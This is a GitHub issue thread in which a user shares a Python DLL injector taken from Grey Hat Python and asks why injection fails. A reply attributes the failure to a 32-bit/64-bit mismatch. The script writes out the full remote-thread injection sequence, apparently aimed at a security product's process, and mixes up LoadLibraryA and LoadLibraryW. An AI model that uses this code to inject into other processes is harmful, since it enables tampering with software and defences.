Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

[!] Failed to inject DLL, exit... 5 #2

Open
LittleHann opened this issue Jan 21, 2017 · 1 comment
Open

[!] Failed to inject DLL, exit... 5 #2

LittleHann opened this issue Jan 21, 2017 · 1 comment

Comments

@LittleHann
Copy link

I met some stranger things

mysql code:
#!/usr/bin/python

Win32 DLL injector from Grey Hat Python

Minor formatting cleanups done...

import sys
from ctypes import *

print "DLL Injector implementation in Python"
print "Taken from Grey Hat Python"

'''
if (len(sys.argv) != 3):
print "Usage: %s " %(sys.argv[0])
print "Eg: %s 1111 C:\test\messagebox.dll" %(sys.argv[0])
sys.exit(0)
'''

PAGE_READWRITE = 0x04
PROCESS_ALL_ACCESS = ( 0x00F0000 | 0x00100000 | 0xFFF )
VIRTUAL_MEM = ( 0x1000 | 0x2000 )

kernel32 = windll.kernel32
#pid = sys.argv[1]
#dll_path = sys.argv[2]
pid = 2312
dll_path = "C:\Users\Administrator\Desktop\pyplugins\ZhudongFangyu\ImgWalk.dll"

dll_len = len(dll_path)

Get handle to process being injected...

h_process = kernel32.OpenProcess( PROCESS_ALL_ACCESS, False, int(pid) )

if not h_process:
print "[!] Couldn't get handle to PID: %s" %(pid)
print "[!] Are you sure %s is a valid PID?" %(pid)
sys.exit(0)

Allocate space for DLL path

arg_address = kernel32.VirtualAllocEx(h_process, 0, dll_len, VIRTUAL_MEM, PAGE_READWRITE)
print "arg_address: ", arg_address

Write DLL path to allocated space

written = c_int(0)
kernel32.WriteProcessMemory(h_process, arg_address, dll_path, dll_len, byref(written))

Resolve LoadLibraryA Address

h_kernel32 = kernel32.GetModuleHandleA("kernel32.dll")
h_loadlib = kernel32.GetProcAddress(h_kernel32, "LoadLibraryW")
print "LoadLibraryA: ", h_loadlib

Now we createRemoteThread with entrypoiny set to LoadLibraryA and pointer to DLL path as param

thread_id = c_ulong(0)

if not kernel32.CreateRemoteThread(h_process, None, 0, h_loadlib, arg_address, 0, byref(thread_id)):
print "[!] Failed to inject DLL, exit...", kernel32.GetLastError()
sys.exit(0)

print "[+] Remote Thread with ID 0x%08x created." %(thread_id.value)

when i run it, i get
DLL Injector implementation in Python
Taken from Grey Hat Python
arg_address: 49938432
LoadLibraryA: 1978878195
[!] Failed to inject DLL, exit... 5

i don't know what's wrong, can i get some tips?
@numaru
Copy link

numaru commented Feb 23, 2017

Hello, it looks like you're trying to inject 64 bits process while your python process is x86.

This thread is related.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@LittleHann @numaru